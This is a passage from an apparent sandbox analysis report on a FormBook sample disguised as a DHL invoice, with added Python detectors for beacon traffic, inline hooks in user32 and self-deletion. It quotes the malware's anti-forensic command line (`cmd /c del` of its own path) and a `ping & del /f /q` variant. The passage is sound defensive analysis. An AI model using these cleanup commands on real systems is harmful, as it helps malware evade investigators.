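            and all(B64_RE.match(v) and len(v) % 4 == 0 for _, v in pairs)):
        score += 1
    if "user-agent" not in {h.lower() for h in req["headers"]}:
        score += 1
    if req["process"].lower().startswith("c:\\windows\\"):   # system binary talking HTTP
        score += 1
    return score


def flag_beacons(requests: List[Dict], threshold: int = 3) -> List[Dict]:
    return [r for r in requests if beacon_score(r) >= threshold]


if __name__ == "__main__":
    for r in flag_beacons(REQUESTS):
        print(beacon_score(r), r["process"], r["host"], r["target"][:40])
```

The process criterion is the one that matters most operationally: explorer.exe has no business opening raw HTTP sessions to freshly registered domains, and the same rule catches the other hosts this family injects into (msdt.exe appears in the process list below). The path and query shape alone will also match some legitimate tracking URLs, which is why the block scores rather than matches.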


                  Code Manipulations

                  User Modules

                  Hook Summary

                  Function Name  Hook Type  Active in Processes
                  PeekMessageA   INLINE     explorer.exe
                  PeekMessageW   INLINE     explorer.exe
                  GetMessageW    INLINE     explorer.exe
                  GetMessageA    INLINE     explorer.exe

                  Processes

                  Process: explorer.exe, Module: user32.dll
                  Function Name  Hook Type  New Data
                  PeekMessageA   INLINE     0x48 0x8B 0xB8 0x8C 0xCE 0xE1
                  PeekMessageW   INLINE     0x48 0x8B 0xB8 0x84 0x4E 0xE1
                  GetMessageW    INLINE     0x48 0x8B 0xB8 0x84 0x4E 0xE1
                  GetMessageA    INLINE     0x48 0x8B 0xB8 0x8C 0xCE 0xE1
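The four hooked exports are the user32 message-retrieval functions, so every window message explorer.exe pulls from its queue passes through the injected code first. The sandbox found them the same way a host scanner does: read the first bytes of each export in the live process and compare them with the clean prologue. The block below is an added example of that comparison (mine, not Joe Sandbox's scanner). The "live" bytes for the four hooked functions are the New Data values from the table; the clean prologues, the load addresses, the unhooked TranslateMessage control and the DispatchMessageW entry with a constructed E9 jump are all made up for illustration and were not observed in this report. A real scanner reads the clean bytes from the mapped DLL file and applies relocations before comparing.

```python
"""Diff live function prologues against clean ones and classify the patch.
Added example; only the LIVE bytes of the four hooked exports come from the
report, everything else below is constructed."""
import struct
from typing import Dict, List, Tuple

MASK64 = (1 << 64) - 1

# Constructed stand-ins for on-disk prologues (not from the report).
CLEAN: Dict[str, bytes] = {
    "PeekMessageA":     bytes.fromhex("4883ec48488bc4"),
    "PeekMessageW":     bytes.fromhex("4883ec48488bc4"),
    "GetMessageW":      bytes.fromhex("4883ec48488bc4"),
    "GetMessageA":      bytes.fromhex("4883ec48488bc4"),
    "TranslateMessage": bytes.fromhex("4883ec28488bd9"),
    "DispatchMessageW": bytes.fromhex("4883ec28488bd1"),
}

# Constructed export addresses, as GetProcAddress would return them in the target.
ADDRESSES: Dict[str, int] = {
    "PeekMessageA":     0x7FFB1A2C1000,
    "PeekMessageW":     0x7FFB1A2C1100,
    "GetMessageW":      0x7FFB1A2C1200,
    "GetMessageA":      0x7FFB1A2C1300,
    "TranslateMessage": 0x7FFB1A2C1400,
    "DispatchMessageW": 0x7FFB1A2C1500,
}

# Bytes as read from the live process. The first four are the "New Data"
# values reported above; TranslateMessage is an unhooked control and
# DispatchMessageW carries a constructed "jmp +0xffb" to exercise target resolution.
LIVE: Dict[str, bytes] = {
    "PeekMessageA":     bytes.fromhex("488bb88ccee1"),
    "PeekMessageW":     bytes.fromhex("488bb8844ee1"),
    "GetMessageW":      bytes.fromhex("488bb8844ee1"),
    "GetMessageA":      bytes.fromhex("488bb88ccee1"),
    "TranslateMessage": bytes.fromhex("4883ec28488bd9"),
    "DispatchMessageW": bytes.fromhex("e9fb0f000090"),
}


def classify_patch(code: bytes, addr: int) -> str:
    """Name the trampoline form when the first bytes are a recognised jump,
    resolving its destination from the function address."""
    if len(code) >= 5 and code[0] == 0xE9:
        rel = struct.unpack_from("<i", code, 1)[0]
        return "jmp rel32 -> 0x%x" % ((addr + 5 + rel) & MASK64)
    if len(code) >= 6 and code[:2] == b"\xFF\x25":
        disp = struct.unpack_from("<i", code, 2)[0]
        return "jmp [rip+disp32], pointer slot at 0x%x" % ((addr + 6 + disp) & MASK64)
    if len(code) >= 6 and code[0] == 0x68 and code[5] == 0xC3:
        return "push imm32 / ret -> 0x%x" % struct.unpack_from("<I", code, 1)[0]
    if len(code) >= 12 and code[:2] == b"\x48\xB8" and code[10:12] == b"\xFF\xE0":
        return "mov rax, imm64 / jmp rax -> 0x%x" % struct.unpack_from("<Q", code, 2)[0]
    return "prologue rewritten; no recognised trampoline in the captured bytes"


def detect_inline_hooks(clean: Dict[str, bytes], live: Dict[str, bytes],
                        addresses: Dict[str, int]) -> List[Tuple[str, str]]:
    """Compare the overlapping prefix of clean and live bytes per export."""
    findings = []
    for name, expected in clean.items():
        observed = live.get(name)
        if observed is None:
            continue
        n = min(len(expected), len(observed))
        if expected[:n] != observed[:n]:
            findings.append((name, classify_patch(observed, addresses[name])))
    return findings


if __name__ == "__main__":
    for name, verdict in detect_inline_hooks(CLEAN, LIVE, ADDRESSES):
        print("%-18s %s" % (name, verdict))
```

The six captured bytes per function are not enough to decode the patch form this family writes, so the honest verdict for the four reported exports is "prologue rewritten"; the classifier only names a destination when the bytes are one of the common trampoline encodings. Comparing the overlapping prefix rather than full prologues keeps the check usable when the scanner captured fewer bytes than the clean copy has.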

                  Statistics

                  Behavior


                  System Behavior

                  General

                  Start time:18:57:22
                  Start date:02/12/2021
                  Path:C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe"
                  Imagebase:0x4e0000
                  File size:449536 bytes
                  MD5 hash:EBCE26DA75669D94DBC0550BF394B204
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET
                  Yara matches:
                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.363236510.00000000028A6000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.363182286.0000000002871000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.364023300.0000000003879000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.364023300.0000000003879000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.364023300.0000000003879000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation:low

                  General

                  Start time:18:57:26
                  Start date:02/12/2021
                  Path:C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe
                  Imagebase:0x990000
                  File size:449536 bytes
                  MD5 hash:EBCE26DA75669D94DBC0550BF394B204
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.437063285.0000000001400000.00000040.00020000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.437063285.0000000001400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.437063285.0000000001400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.437007987.00000000013D0000.00000040.00020000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.437007987.00000000013D0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.437007987.00000000013D0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.360478598.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.360478598.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.360478598.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.436548736.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.436548736.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.436548736.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.359940174.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.359940174.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.359940174.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation:low

                  General

                  Start time:18:57:29
                  Start date:02/12/2021
                  Path:C:\Windows\explorer.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\Explorer.EXE
                  Imagebase:0x7ff6f22f0000
                  File size:3933184 bytes
                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.393113317.000000000EE6F000.00000040.00020000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.393113317.000000000EE6F000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.393113317.000000000EE6F000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.405515832.000000000EE6F000.00000040.00020000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.405515832.000000000EE6F000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.405515832.000000000EE6F000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation:high

                  General

                  Start time:18:58:00
                  Start date:02/12/2021
                  Path:C:\Windows\SysWOW64\msdt.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\msdt.exe
                  Imagebase:0xb30000
                  File size:1508352 bytes
                  MD5 hash:7F0C51DBA69B9DE5DDF6AA04CE3A69F4
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.622111638.0000000002CE0000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.622111638.0000000002CE0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.622111638.0000000002CE0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.617350722.0000000000700000.00000040.00020000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.617350722.0000000000700000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.617350722.0000000000700000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.622077394.0000000002CB0000.00000040.00020000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.622077394.0000000002CB0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.622077394.0000000002CB0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation:moderate

                  General

                  Start time:18:58:04
                  Start date:02/12/2021
                  Path:C:\Windows\SysWOW64\cmd.exe
                  Wow64 process (32bit):true
                  Commandline:/c del "C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe"
                  Imagebase:0x2a0000
                  File size:232960 bytes
                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:18:58:06
                  Start date:02/12/2021
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff61de10000
                  File size:625664 bytes
                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
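The process list above shows the loader's cleanup: a cmd.exe started at 18:58:04 with `/c del "<sample path>"`, forty-two seconds after that same image was first executed. Self-deletion is easy to catch when process-creation events are correlated by image path rather than inspected one at a time. The block below is an added example of that correlation (mine, not part of the report); the events are constructed from the start times, paths and command lines in the System Behavior entries, and the deletion regex is my own.

```python
"""Flag self-deletion: a cmd.exe command line that deletes the image of a
process started earlier in the same session. Added example; events are
constructed from this report's System Behavior entries."""
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

SAMPLE = r"C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe"


@dataclass(frozen=True)
class ProcStart:
    time: str      # HH:MM:SS within one session, so string order is time order
    path: str
    cmdline: str


EVENTS: List[ProcStart] = [
    ProcStart("18:57:22", SAMPLE, '"%s"' % SAMPLE),
    ProcStart("18:57:26", SAMPLE, SAMPLE),
    ProcStart("18:57:29", r"C:\Windows\explorer.exe", r"C:\Windows\Explorer.EXE"),
    ProcStart("18:58:00", r"C:\Windows\SysWOW64\msdt.exe", r"C:\Windows\SysWOW64\msdt.exe"),
    ProcStart("18:58:04", r"C:\Windows\SysWOW64\cmd.exe", '/c del "%s"' % SAMPLE),
    ProcStart("18:58:06", r"C:\Windows\System32\conhost.exe",
              r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
]

# 'del' or 'erase', optional switches such as /f /q, then a quoted or bare path.
DEL_RE = re.compile(r'\b(?:del|erase)\b(?:\s+/[a-z]+)*\s+"?([^"&]+?)"?\s*$', re.IGNORECASE)


def deleted_paths(cmdline: str) -> List[str]:
    """Every path a cmd.exe command line deletes, one per '&'-chained command,
    lower-cased for comparison with image paths."""
    found = []
    for command in re.split(r"\s*&+\s*", cmdline):
        m = DEL_RE.search(command)
        if m:
            found.append(m.group(1).strip().lower())
    return found


def find_self_deletion(events: List[ProcStart]) -> List[Tuple[str, str, str]]:
    """(cmd start time, deleted path, earliest start of a process with that image)."""
    first_seen: Dict[str, str] = {}
    for e in events:
        first_seen.setdefault(e.path.lower(), e.time)
    hits = []
    for e in events:
        if not e.path.lower().endswith("\\cmd.exe"):
            continue
        for target in deleted_paths(e.cmdline):
            if target in first_seen and first_seen[target] < e.time:
                hits.append((e.time, target, first_seen[target]))
    return hits


if __name__ == "__main__":
    for when, target, started in find_self_deletion(EVENTS):
        print("%s cmd.exe deleted %s (first executed at %s)" % (when, target, started))
```

The `&`-splitting matters in practice because the common variant is `ping 127.0.0.1 -n N > nul & del /f /q "<path>"`, where the ping delays the delete until the parent has exited; the parser handles that form as well as the plain one captured here.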

                  Disassembly

                  Code Analysis
